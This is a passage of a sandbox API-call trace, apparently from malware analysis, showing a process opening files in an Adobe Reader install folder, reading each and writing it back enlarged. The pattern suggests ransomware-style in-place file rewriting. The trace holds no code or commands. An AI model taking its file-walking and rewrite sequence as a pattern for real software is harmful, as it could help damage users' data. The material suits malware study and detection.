nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2d5f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0066.804] CloseHandle (hObject=0x1fc) returned 1 [0066.807] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0067.079] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.079] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1e00 [0067.080] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.080] ReleaseMutex (hMutex=0x168) returned 1 [0067.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HUN", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.HUN", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.HUN", lpUsedDefaultChar=0x0) returned 11 [0067.080] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2d5f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0067.082] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0067.082] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2d5f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0067.083] CloseHandle (hObject=0x1fc) returned 1 [0067.084] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Browser\\nppdf32.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0067.085] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.086] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2000 [0067.086] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.086] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.086] ReleaseMutex (hMutex=0x168) returned 1 [0067.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nppdf32.RUM", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nppdf32.RUM", lpUsedDefaultChar=0x0) returned 11 [0067.086] ReadFile (in: hFile=0x1fc, lpBuffer=0x2668a38, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesRead=0x2d5f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0067.088] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0067.089] WriteFile (in: hFile=0x1fc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x2d5f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0067.089] CloseHandle (hObject=0x1fc) returned 1 [0067.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\cryptocme2.sig" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\cryptocme2.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0067.099] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.099] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x647 [0067.099] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.099] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.099] ReleaseMutex (hMutex=0x168) returned 1 [0067.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cryptocme2.sig", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cryptocme2.sig", cchWideChar=14, lpMultiByteStr=0x1f7346c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cryptocme2.sig", lpUsedDefaultChar=0x0) returned 14 [0067.099] ReadFile (in: hFile=0x1fc, lpBuffer=0x26cf048, nNumberOfBytesToRead=0x647, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesRead=0x2d5f2bc*=0x647, lpOverlapped=0x0) returned 1 [0067.101] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0067.101] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xbcf, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xbcf, lpOverlapped=0x0) returned 1 [0067.101] CloseHandle (hObject=0x1fc) returned 1 [0067.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0067.104] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.105] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x13a5b [0067.105] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.105] ReleaseMutex (hMutex=0x168) returned 1 [0067.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0067.105] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0067.107] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12a5b [0067.107] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.108] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x12a5b [0067.108] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867b58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867b58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0067.108] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0067.109] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0067.109] CloseHandle (hObject=0x1fc) returned 1 [0067.110] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0067.111] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.111] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa835 [0067.111] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.111] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.111] ReleaseMutex (hMutex=0x168) returned 1 [0067.111] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0067.112] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0067.114] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9835 [0067.114] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.114] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9835 [0067.115] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867b58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867b58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0067.115] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0067.115] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a4048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a4048*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0067.115] CloseHandle (hObject=0x1fc) returned 1 [0067.122] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0067.123] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.123] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc490 [0067.123] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0067.123] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0067.123] ReleaseMutex (hMutex=0x168) returned 1 [0067.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.123] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0067.123] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0067.722] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb490 [0067.722] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0067.830] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xb490 [0067.831] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867b58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867b58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0067.831] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0067.831] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0067.831] CloseHandle (hObject=0x1fc) returned 1 [0067.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.148] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.149] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x18e95 [0069.149] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.149] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.149] ReleaseMutex (hMutex=0x168) returned 1 [0069.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0069.150] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0069.152] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17e95 [0069.152] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.153] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x17e95 [0069.154] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea99b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.155] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0069.155] WriteFile (in: hFile=0x1e4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0069.155] CloseHandle (hObject=0x1e4) returned 1 [0069.158] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.158] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.159] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xd746 [0069.159] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.159] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.159] ReleaseMutex (hMutex=0x168) returned 1 [0069.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="license.html", lpUsedDefaultChar=0x0) returned 12 [0069.159] ReadFile (in: hFile=0x1e4, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0069.162] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xc746 [0069.163] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.163] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xc746 [0069.163] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ea99b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea99b8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.164] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0069.164] WriteFile (in: hFile=0x1e4, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0069.164] CloseHandle (hObject=0x1e4) returned 1 [0069.166] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.166] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.167] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc2f5 [0069.167] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0069.167] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.167] ReleaseMutex (hMutex=0x168) returned 1 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="license.html", cchWideChar=12, lpMultiByteStr=0x1f7342c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 